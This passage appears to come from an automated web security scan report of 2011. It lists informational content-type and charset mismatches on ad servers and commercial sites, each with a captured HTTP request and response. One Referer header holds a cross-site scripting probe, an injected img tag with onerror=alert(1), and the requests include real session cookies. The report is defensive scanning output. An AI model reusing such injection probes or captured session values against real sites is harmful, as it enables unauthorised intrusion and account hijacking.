s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:10:23 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
Last-Modified: Tue, 26 Oct 2010 18:00:52 GMT
ETag: "15decf-2490-4cc71754"
Accept-Ranges: bytes
Content-Length: 9360
Keep-Alive: timeout=360, max=99992
Connection: Keep-Alive
Content-Type: text/html
x-frame-options: sameorigin

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=macintosh">
<title>
...[SNIP]...

30.2. http://www.made-in-china.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.made-in-china.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET / HTTP/1.1
Host: www.made-in-china.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:28:13 GMT
Server: Apache
Cache-Control: private
Set-Cookie: sf_img=AM; domain=.made-in-china.com; path=/; expires=Fri, 03-Feb-2012 20:28:13 GMT
Set-Cookie: cid=jAxMTAyMDQwNDI4MTM4NjMwMDA6MDE3MTM0NDI4NzEyMzU4MTU1MTEM; domain=.made-in-china.com; path=/
Set-Cookie: sid=TE5OTQ5MTE5NTgzMjI5MzoxNzMuMTkzLjIxNC4yNDMO; domain=.made-in-china.com; path=/
Set-Cookie: JSESSIONID=aYL_X1GnJqlf; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=GBK
Content-Length: 98587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="
...[SNIP]...
<meta name="description"
content="China manufacturer directory and China products catalog, providing trade leads among China factory, manufacturers, suppliers, and global buyers." />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link rel="stylesheet" type="text/css" href="/style/home.css?t=0131154813" />
...[SNIP]...

31. Content type incorrectly stated  previous  next
There are 93 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


31.1. http://2e76.v.fwmrm.net/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://2e76.v.fwmrm.net
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: 2e76.v.fwmrm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cph="1295039779.438.1.1,"; _sid="c110_5569572937864193463"; _sc="sg12288.1296767252.1296767690.28800.412.22,"; _auv="g12288~1.1296767276.412,4.1296767649.172,12720.1296767276.412,12722.1296767649.172,^"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _cvr="1296767690^11894^sg12288~sg11948^0~0^412.000000~22.750000,"; _uid="a104_5562153497824379009"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3145525d5f4f58455e445a4a423209; _wr="g12288"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,";

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "2210165280"
Last-Modified: Thu, 08 Apr 2010 22:35:44 GMT
Content-Length: 10
Date: Thu, 03 Feb 2011 22:03:03 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

NJBads010

31.2. http://abc.go.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://abc.go.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: abc.go.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-866104378-1296054794370; s_vi=[CS]v1|26A01CF88501110F-40000107200282CA[CE]; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1296054866; DETECT=1.0.0&106877&15933611&1&1; __unam=6f6df6e-12dc400f3a6-4a637419-2; DE2=KioqOyoqKjtwcml2YXRlO2Jyb2FkYmFuZDs1OzU7NTswOzAwMC4wMDA7MDAwMC4wMDA7OTk5OzUzODM7MjswOyoqOw==; SWID=3F99CDD3-DF86-4EF8-BD80-737C5EC47C1B; s_pers=%20s_c20%3D1296145395007%7C1390753395007%3B%20s_c20_s%3DLess%2520than%25201%2520day%7C1296147195007%3B%20s_gpv_pn%3D/wabc/story%7C1296147195014%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=180
Content-Type: text/plain; charset=UTF-8
Last-Modified: Sat, 01 May 2010 18:49:13 GMT
Accept-Ranges: bytes
ETag: "805aeffd5ee9ca1:19a26"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Fri, 04 Feb 2011 01:51:14 GMT
Date: Fri, 04 Feb 2011 01:51:02 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2550

..............h...&......... .h.......(....... ...........@...........................................111.sss.........'''.....""".............}}}.....===.ZZZ.EEE.........@@@.777.:::.qqq.........```...
...[SNIP]...

31.3. http://ads.adap.tv/beacons  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /beacons?callback=jsonp1296766389465 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+12%3A52%3A27";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 22:39:07 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 129

jsonp1296766389465({
   "beacons":["http://tags.bluekai.com/site/2174", "http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif"]
})

31.4. http://ads.gmodules.com/gadgets/makeRequest  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.gmodules.com
Path:   /gadgets/makeRequest

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /gadgets/makeRequest?refresh=1800&url=http%3A%2F%2Fgadgetadservices.appspot.com%2Fkayak%2Fhotelkeyword%3Fk%3Dchicago%2520hotels&httpMethod=GET&headers=&postData=&authz=&st=&contentType=TEXT&numEntries=3&getSummaries=false&signOwner=true&signViewer=true&gadget=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml&container=ads&bypassSpecCache=&getFullHeaders=false HTTP/1.1
Host: ads.gmodules.com
Proxy-Connection: keep-alive
Referer: http://ads.gmodules.com/gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=chicago%20hotels&up_city=Crystal&up_region=US-MI&up_lat=43.26&up_long=-84.91
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Fri, 04 Feb 2011 02:36:56 GMT
Content-Disposition: attachment;filename=p.txt
Content-Type: application/json; charset=UTF-8
Date: Fri, 04 Feb 2011 02:06:56 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public,max-age=1800
Age: 1752
Content-Length: 191

throw 1; < don't be evil' >{"http://gadgetadservices.appspot.com/kayak/hotelkeyword?k=chicago%20hotels":{"body":"\n,USA,IL,Chicago,12514,\n","DataHash":"64ous7atc8u5lbp8m3aa4eaa8c","rc":200}}

31.5. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1443976/0/0/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1443976/0/0/ADTECH

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adrawdata/3.0/5108.1/1443976/0/0/ADTECH;kvinvtype=display;kvrid=12dee7b87149f052badfd9a8c000af6b;kvexpandable=0;kvdim=300x250;kvbw=0;kvpid=1443976;kvgf=138;kva3554=124;kvagt18=103;kvagt35=113;kvagt25=106 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 98

var ve_am = { "housead": "true", "adid" : "1242536-1", "ccid": "1242536-1", "reason": "IFRAME" };

31.6. http://amch.questionmarket.com/adsc/d647401/46/794570/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d647401/46/794570/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d647401/46/794570/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:40 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 05:04:56 GMT
ETag: "400480f2-1-496caf2249329"
Accept-Ranges: bytes
Content-Length: 1
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Cache-Control: public, max-age=1800
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: application/javascript

;

31.7. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d647401/46/799689/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:40 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 07 Dec 2010 05:04:57 GMT
ETag: "c05d16c5-1-f2265040"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:40 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=620
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.8. http://amch.questionmarket.com/adsc/d724324/16/726813/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/16/726813/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/16/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 13 Oct 2010 04:04:12 GMT
ETag: "700d6ef7-1-49277afa8ba7c"
Accept-Ranges: bytes
Content-Length: 1
Vary: Accept-Encoding
Keep-Alive: timeout=120, max=311
Connection: Keep-Alive
Content-Type: application/javascript

;

31.9. http://amch.questionmarket.com/adsc/d724324/16/752263/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/16/752263/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/16/752263/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:28 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 13 Oct 2010 04:04:13 GMT
ETag: "200fe112-1-afada940"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:28 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=941
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.10. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/16/752264/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/16/752264/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:30 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 04:04:13 GMT
ETag: "3010039e-1-49277afaf7149"
Accept-Ranges: bytes
Content-Length: 1
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Cache-Control: public, max-age=1800
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: application/javascript

;

31.11. http://amch.questionmarket.com/adsc/d724324/16/752265/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/16/752265/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/16/752265/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:30 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 13 Oct 2010 04:04:13 GMT
ETag: "400e88c6-1-afada940"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:30 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=957
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.12. http://amch.questionmarket.com/adsc/d724324/16/752266/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/16/752266/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/16/752266/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:32 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 13 Oct 2010 04:04:13 GMT
ETag: "500dacb0-1-afada940"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:32 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=976
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.13. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/726813/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:33:58 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 13 Oct 2010 04:04:27 GMT
ETag: "c01ef48c-1-49277b08fc0e5"
Accept-Ranges: bytes
Content-Length: 1
Vary: Accept-Encoding
Keep-Alive: timeout=120, max=859
Connection: Keep-Alive
Content-Type: application/javascript

;

31.14. http://amch.questionmarket.com/adsc/d724324/27/752266/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/752266/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/27/752266/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:32 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 13 Oct 2010 04:04:28 GMT
ETag: "a52006ca-1-b0928b00"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:32 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=899
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.15. http://amch.questionmarket.com/adsc/d724324/27/752268/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/752268/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/27/752268/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:29:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 13 Oct 2010 04:04:28 GMT
ETag: "c464712e-1-49277b0955e70"
Accept-Ranges: bytes
Content-Length: 1
Vary: Accept-Encoding
Keep-Alive: timeout=120, max=976
Connection: Keep-Alive
Content-Type: application/javascript

;

31.16. http://amch.questionmarket.com/adsc/d724324/27/752269/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/752269/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/27/752269/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 04:04:28 GMT
ETag: "d7b5efb3-1-49277b095eb11"
Accept-Ranges: bytes
Content-Length: 1
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Cache-Control: public, max-age=1800
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: application/javascript

;

31.17. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/752289/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d724324/27/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:35 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 13 Oct 2010 04:04:28 GMT
ETag: "e379018d-1-b0928b00"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:35 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=616
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.18. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d747416/11/748729/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d747416/11/748729/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:35 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 01 Sep 2010 04:10:23 GMT
ETag: "100de398-1-e065a9c0"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:35 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=985
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.19. http://amch.questionmarket.com/adsc/d747416/11/755589/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d747416/11/755589/randm.js

Issue detail

